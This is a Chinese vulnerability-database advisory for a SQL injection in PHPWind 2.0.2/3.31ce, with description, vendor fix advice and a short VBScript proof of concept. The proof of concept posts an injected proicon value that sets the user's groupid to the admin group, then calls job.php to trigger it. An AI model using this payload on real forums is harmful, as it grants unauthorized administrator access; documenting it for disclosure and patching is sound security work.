PHPWind job.php远程SQL注入漏洞

基本字段

漏洞编号:
SSV-4341
披露/发现时间:
未知
提交时间:
2008-10-27
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
PHPWind
(2.0.2)
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0.7KB

PHPWind实现上存在输入验证漏洞,远程攻击者可能利用此漏洞非授权获取论坛的管理员权限。

PHPWind的job.php脚本对待处理的数据未作充分的过滤检查即用来构造SQL请求,远程攻击者可以通过向profile.php脚本的proicon变量传递带有恶意SQL命令串的数据并最终调用job.php,触发漏洞执行SQL注入攻击。攻击者可能利用此漏洞获取论坛的管理权限。

PHPWind PHPWind 2.0.2/3.31ce

PHPWind

目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:

http://www.phpwind.net/

xi4mi my1e5 forworldreg cjkbsg 共 6  兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得   0.55KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
kevin1986
---------------------------codz start here-----------------------------------
set k=createobject("MSXML2.XMLHTTP")
thestr="proemail=themailof@you.net&proicon=0.gif%27%2Cgroupid%3D%273%7Ctest&step=2"
k.open "POST","http://www.****.net/phpwind/profile.php",false,false
k.setRequestHeader "Content-Length",Len(thestr)
k.setRequestHeader "CONTENT-TYPE","application/x-www-form-urlencoded"
k.send(thestr)
k.open "Get","http://www.****.net/phpwind/job.php?action=delimg"
k.send
msgbox "the ninth line will tell u the program Send Finished right now And More iwan2C." & vbcrlf & "infact im not interesting in anything what u r talk about except technology." & vbcrlf & "hommmm.everyone. if u wanna share.please share it free in anyway."
----------------------------codz end here------------------------------------
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

my1e5 forworldreg cjkbsg 共 6 兑换

参考链接

解决方案

临时解决方案

官方解决方案

升级到最新无漏洞版本

防护方案

人气 1342
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负